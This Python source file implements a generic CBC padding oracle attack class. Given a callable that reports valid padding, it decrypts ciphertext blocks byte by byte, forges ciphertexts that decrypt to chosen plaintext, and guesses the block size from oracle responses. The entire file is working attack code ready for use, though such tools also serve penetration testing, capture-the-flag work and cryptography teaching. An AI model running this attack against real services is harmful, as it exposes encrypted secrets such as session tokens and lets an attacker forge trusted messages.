#!/usr/bin/python
import binascii
import logging
import random
from base64 import b64decode, b64encode, urlsafe_b64decode, urlsafe_b64encode
from copy import deepcopy


class Encoding:
    """Enum-like namespace: integer tags for the supported ciphertext encodings."""

    # Tags in declaration order; note that the value 4 is not assigned.
    b64, b64_web, hex, raw = 1, 2, 3, 5

class PaddingOracle(object):
    """
    Generic code to attack CBC padding oracles.

    The ciphertext is decoded once (see ``decode``) and kept as a list of
    ``bytearray`` blocks of ``BS`` bytes each. Every attack step hands the
    oracle the *raw* (decoded) concatenation of the blocks under test.

    Attributes set by ``__init__``:
        encoding     -- one of the ``Encoding`` tags, used by decode/encode
        oracle_func  -- callable(raw_ciphertext) -> truthy when the padding is valid
        analyse_func -- initialised to None (not used inside this class)
        ct           -- decoded ciphertext
        BS           -- block size in bytes
        num_blocks   -- number of BS-sized blocks in ``ct``
        blocks       -- list of bytearray blocks
        it_blocks    -- {block index: intermediate block} recovered so far
        pt_blocks    -- {block index: plaintext block} recovered so far
    """

    # Text type on both Python 2 (unicode) and Python 3 (str).
    _TEXT_TYPE = type(u"")

    def __init__(self, ciphertext, BS=None, verbosity=1, encoding=Encoding.b64, oracle=None):
        """
        Decode the ciphertext and split it into blocks.

        ciphertext -- the ciphertext, encoded as described by ``encoding``
        BS         -- block size in bytes; when None it is probed via the oracle
        verbosity  -- 0, 1 or 2 (see ``set_verbosity``)
        encoding   -- ``Encoding`` tag of the input (and of ``encode`` output)
        oracle     -- callable(raw_ciphertext) returning truthy for valid padding

        Raises Exception when the decoded length is not a multiple of BS, or
        when BS has to be probed but no oracle was supplied.
        """
        # setup logging - default
        self.set_verbosity(verbosity)

        # init class variables
        self.encoding = encoding
        self.oracle_func = oracle
        self.analyse_func = None

        # decode the initial ciphertext
        self.ct = self.decode(ciphertext)

        # An explicitly supplied BS must be stored as well; only probe the
        # oracle when the caller did not provide one.
        if BS is None:
            BS = self.get_blocksize(self.ct)
        self.BS = BS

        self.num_blocks = self._ct_init()

        self.blocks = self.split_blocks(self.ct)
        self._outmode = "hex"

        # backup it_blocks and pt_blocks as dict {index:block} - for changing blocks
        self.it_blocks = {}
        self.pt_blocks = {}

    def decode(self, ciphertext):
        """
        Decode ``ciphertext`` according to ``self.encoding``.

        Internally the ciphertext is processed as a byte string. Unknown
        encodings (including ``Encoding.raw``) return the input unchanged.
        """
        if self.encoding == Encoding.b64:
            return b64decode(ciphertext)
        if self.encoding == Encoding.hex:
            return binascii.unhexlify(ciphertext)
        if self.encoding == Encoding.b64_web:
            # NOTE(review): "b64_web" is interpreted as the URL-safe base64
            # alphabet ('-' and '_'); standard '+' and '/' still decode.
            return urlsafe_b64decode(ciphertext)
        return ciphertext

    def encode(self, ciphertext):
        """
        Encode a raw ciphertext according to ``self.encoding``.

        This is the inverse of ``decode`` so results are returned in the same
        fashion as the input was given.
        """
        if self.encoding == Encoding.b64:
            return b64encode(ciphertext)
        if self.encoding == Encoding.hex:
            return binascii.hexlify(ciphertext)
        if self.encoding == Encoding.b64_web:
            # NOTE(review): URL-safe alphabet, mirroring ``decode``.
            return urlsafe_b64encode(ciphertext)
        return ciphertext

    def _ct_init(self):
        """
        Check that the ciphertext length fits the block size.

        Returns the number of blocks (an int); raises Exception when the
        length is not a multiple of ``self.BS``.
        """
        if len(self.ct) % self.BS != 0:
            raise Exception("[-] Length not a multiple of the BS")
        # floor division keeps the count an int on Python 3 as well
        return len(self.ct) // self.BS

    def split_blocks(self, ct):
        """
        Split ``ct`` into a list of ``bytearray`` blocks of ``self.BS`` bytes.

        Text input is encoded as latin-1 first so each character maps to
        exactly one byte.
        """
        if isinstance(ct, self._TEXT_TYPE):
            ct = ct.encode("latin-1")
        return [bytearray(ct[i:i + self.BS]) for i in range(0, len(ct), self.BS)]

    def merge_blocks(self, blocks):
        """Concatenate the blocks and return them as one raw byte string."""
        return b"".join(bytes(bytearray(b)) for b in blocks)

    def last_word_oracle(self, y):
        """
        Recover the trailing byte(s) of the intermediate value of block ``y``.

        Follows the "last word oracle" construction: a random block ``r`` is
        placed in front of ``y`` and its last byte is varied until the oracle
        accepts ``r | y``. Bytes of ``r`` are then flipped from left to right
        to find out how long the accepted padding actually is.

        y -- one ciphertext block (bytes, bytearray or list of ints)

        Returns a list of ints: the last n bytes of the intermediate value,
        where n is the padding length the oracle accepted (usually 1).
        Raises Exception when no oracle is set or no candidate is accepted.
        """
        if self.oracle_func is None:
            raise Exception("[-] No Oracle function set!")

        target = bytes(bytearray(y))
        r = bytearray(random.randint(0x00, 0xff) for _ in range(self.BS))
        r_b = r[-1]

        for i in range(256):
            r[-1] = r_b ^ i
            # ask the oracle
            if self.oracle_func(bytes(r) + target):
                break
        else:
            raise Exception("[-] Oracle rejected every candidate for the last byte")

        # r[-1] now holds r_b ^ i, i.e. a byte that produces valid padding.
        # for n = b down to 2: if flipping byte (b - n) breaks the padding,
        # that byte is part of it and the padding is n bytes long.
        for n in range(self.BS, 1, -1):
            probe = bytearray(r)
            probe[self.BS - n] ^= 1
            if not self.oracle_func(bytes(probe) + target):
                return [byte ^ n for byte in r[self.BS - n:]]

        # padding is 0x01
        return [r[-1] ^ 1]

    def crack_last_block(self, blocks):
        """
        Decrypt the last block of ``blocks`` with the padding oracle.

        ``self.oracle_func(ct)`` must return a truthy value when the padding
        of ``ct`` is correct and a falsy value on a padding error.

        blocks -- list of ciphertext blocks; the last one is attacked and the
                  second-to-last one is the block that gets tampered with.
                  The list and its blocks are NOT modified (a private copy is
                  used).

        Returns ``(it_block, pt_block)`` as two lists of ints: the
        intermediate block (cipher output before the CBC xor) and the
        plaintext block. A byte for which the oracle accepts no guess stays 0
        and a warning is logged.

        Raises IndexError when fewer than two blocks are given and Exception
        when no oracle is set.
        """
        if len(blocks) < 2:
            raise IndexError("[-] Need at least two blocks to crack the last one")
        if self.oracle_func is None:
            raise Exception("[-] No Oracle function set!")

        bs = self.BS

        # private working copy so the caller's blocks are never modified
        work = [bytearray(b) for b in blocks]
        pre_ct = work[-2]                  # second to last ct block - gets modified
        orig_pre_ct = bytearray(pre_ct)    # untouched reference copy

        pt_block = [0] * bs   # plaintext block
        it_block = [0] * bs   # intermediate block

        real_padding = bs
        first_run = True

        # byte_index is counting backwards in the second-to-last block
        for byte_index in range(bs - 1, -1, -1):

            padding = bs - byte_index

            # Force the already recovered trailing bytes to the padding value
            # of this round (empty range during the first round).
            for prev_byte_index in range(bs - 1, byte_index, -1):
                pre_ct[prev_byte_index] = it_block[prev_byte_index] ^ padding

            hit = None
            skipped = None
            for guess in range(256):
                # iterate the bytes @ byte_index position
                pre_ct[byte_index] = guess

                # ask the oracle
                if not self.oracle_func(self.merge_blocks(work)):
                    continue

                # The unmodified byte may be accepted only because of the
                # original padding; prefer any other accepted guess.
                if guess == orig_pre_ct[byte_index] and padding < real_padding:
                    skipped = guess
                    continue

                hit = guess
                break

            if hit is None:
                # Only the original byte was accepted (e.g. the real padding
                # is 0x01), so it is the right answer after all.
                hit = skipped

            if hit is None:
                logging.warning("[-] no valid guess found for byte @ offset %d", byte_index)
                continue

            pt_block[byte_index] = hit ^ padding ^ orig_pre_ct[byte_index]

            if first_run:
                real_padding = pt_block[byte_index]
                print('')
                first_run = False

            it_block[byte_index] = hit ^ padding
            logging.debug(
                "[~]  correct padding [{0}] with byte [{1}]\n\t-> it_byte = {0} ^ {1}    = {3}\n\t-> pt_byte = it_byte ^ {2} = {4}\n".format(
                    hex(padding), hex(hit), hex(orig_pre_ct[byte_index]),
                    hex(it_block[byte_index]), hex(pt_block[byte_index])))
            logging.debug("[+] Plaintext Block: %s", pt_block)

        return it_block, pt_block

    def print_ct_blocks(self):
        """Print the ciphertext blocks as a hexdump, one block per line."""
        print("[~] ciphertext as blockwise hexdump")
        print(self.hexdump(self.merge_blocks(self.blocks), length=self.BS))

    def bytes_to_string(self, inp):
        """Convert an iterable of byte values (ints) to a string."""
        return "".join([chr(p) for p in inp])

    def change_block(self, new_plaintext):
        """
        Forge a ciphertext whose blocks decrypt to ``new_plaintext``.

        Block ``idx`` of ``new_plaintext`` is the desired plaintext of
        ciphertext block ``idx``. Working from the last requested block down
        to index 1, the preceding ciphertext block is rewritten so the target
        decrypts to the wanted value. Block 0 of ``new_plaintext`` is never
        read by this loop. ``self.blocks`` is left untouched.

        Returns the forged ciphertext, encoded via ``encode``.
        Raises Exception when the length is not a multiple of the block size
        or when more blocks are requested than the ciphertext has.
        """
        if len(new_plaintext) % self.BS != 0:
            raise Exception("[-] new plaintext should be a multiple of the blocksize")

        new_blocks = self.split_blocks(new_plaintext)
        local_blocks = deepcopy(self.blocks)

        if len(new_blocks) > len(local_blocks):
            raise Exception("[-] Plaintext is too long")

        # Starting at the last requested block; the intermediate value is
        # recomputed each round because the block in front was just changed.
        for idx in range(len(new_blocks) - 1, 0, -1):
            logging.info("[*] changing index %d", idx)
            it_block = self.get_it_block(idx, local_blocks)
            local_blocks[idx - 1] = bytearray(
                wanted ^ inter for wanted, inter in zip(new_blocks[idx], it_block))

        # block_0 acts as IV for block_1, so the complete message can be changed
        return self.encode(self.merge_blocks(local_blocks))

    def get_it_block(self, index, ct_blocks):
        """
        Return the intermediate block of ``ct_blocks[index]``.

        index := {1, .., len-1}; index 0 raises Exception because the first
        block has no preceding block to tamper with.
        """
        if not index:
            raise Exception("[-] Cannot decrypt the first block")
        it_block, _ = self.crack_last_block(ct_blocks[:index + 1])
        return it_block

    def crack_block(self, index):
        """
        Decrypt the block @ index of the stored ciphertext and print it.

        index := {1, .., len-1}; index 0 raises Exception. The results are
        stored in ``self.it_blocks[index]`` and ``self.pt_blocks[index]``.
        """
        if not index:
            raise Exception("[-] Cannot decrypt the first block")
        it_block, pt_block = self.crack_last_block(self.blocks[:index + 1])

        self.it_blocks[index] = it_block
        self.pt_blocks[index] = pt_block

        logging.info("\n[+] decrypted block [%d]\n", index)
        self._output(pt_block)

    def _output(self, pt_block):
        """
        Universal function to print plaintext (a list of byte values).

        Uses ``self._outmode``: "hex" prints a hexdump, "str" prints the
        bytes as a string; any other mode prints only the header.
        """
        print("-----[ Plaintext ]-----")

        if self._outmode == "hex":
            print(self.hexdump(pt_block))
        elif self._outmode == "str":
            print(self.bytes_to_string(pt_block))

    def set_output(self, mode):
        """Set the output mode ("hex" or "str") for printing the plaintext."""
        self._outmode = mode

    def set_verbosity(self, level):
        """
        Configure the root logger for the given verbosity.

        0 = logging.WARNING
        1 = logging.INFO
        2 = logging.DEBUG
        Any other value falls back to INFO.
        """
        levels = {
            0: logging.WARNING,
            1: logging.INFO,
            2: logging.DEBUG,
        }
        chosen = levels.get(level, logging.INFO)
        logging.basicConfig(format='%(message)s', level=chosen)
        # basicConfig does nothing once the root logger has handlers, so set
        # the level explicitly to make later calls take effect too.
        logging.getLogger().setLevel(chosen)

    def decrypt_all_blocks(self):
        """
        Crack all blocks of the ciphertext (except the first one).

        Blocks are attacked from last to first; results are stored in
        ``self.it_blocks`` / ``self.pt_blocks`` keyed by block index and the
        joined plaintext is printed via ``_output``.
        """
        num_blocks = len(self.blocks)
        recovered = []
        logging.info("[*] decrypting all %d blocks", num_blocks)

        for idx in range(num_blocks, 1, -1):
            logging.info("\n-----[ decrypting block %d ]-----\n", idx)
            it_block, pt_block = self.crack_last_block(self.blocks[:idx])
            recovered.append(pt_block)

            self.it_blocks[idx - 1] = it_block
            self.pt_blocks[idx - 1] = pt_block

        # blocks were recovered back to front; flatten them in message order
        pt = [byte for block in reversed(recovered) for byte in block]

        logging.info("\n[+] decrypted all the blocks\n")
        self._output(pt)

    def get_blocksize(self, ciphertext):
        """
        Guess the block size (8 or 16) - heuristic described in
        'Practical Padding Oracle Attacks', by T. Duong & J. Rizzo.

        Works like following:
          * a length that is 8 modulo 16 can only fit 8-byte blocks;
          * otherwise the last 16 bytes are appended once more and the oracle
            is asked: if the padding is accepted the block size is reported
            as 8, else as 16.

        Raises Exception when the oracle is needed but not set.
        """
        if len(ciphertext) % 16 == 8:
            return 8

        if self.oracle_func is None:
            raise Exception('Error: Not oracle set!')

        c = ciphertext[-16:]
        if self.oracle_func(ciphertext + c):
            return 8

        return 16

    def hexdump(self, src, length=16):
        """
        Return ``src`` as hexdump text with ``length`` bytes per line.

        Layout based on https://gist.github.com/sbz/1080258 : offset, hex
        bytes, printable characters. ``src`` may be a byte string, bytearray,
        list of ints or text (encoded as latin-1).
        """
        if isinstance(src, self._TEXT_TYPE):
            src = src.encode("latin-1")
        data = bytearray(src)

        lines = []
        for offset in range(0, len(data), length):
            chunk = data[offset:offset + length]
            hexa = ' '.join("%02x" % b for b in chunk)
            # Printable ASCII is shown as-is; everything else (and the
            # backslash, as in the original filter) is shown as '.'.
            printable = ''.join(
                chr(b) if 0x20 <= b <= 0x7e and b != 0x5c else '.' for b in chunk)
            lines.append("%04x  %-*s  %s\n" % (offset, length * 3, hexa, printable))
        return ''.join(lines)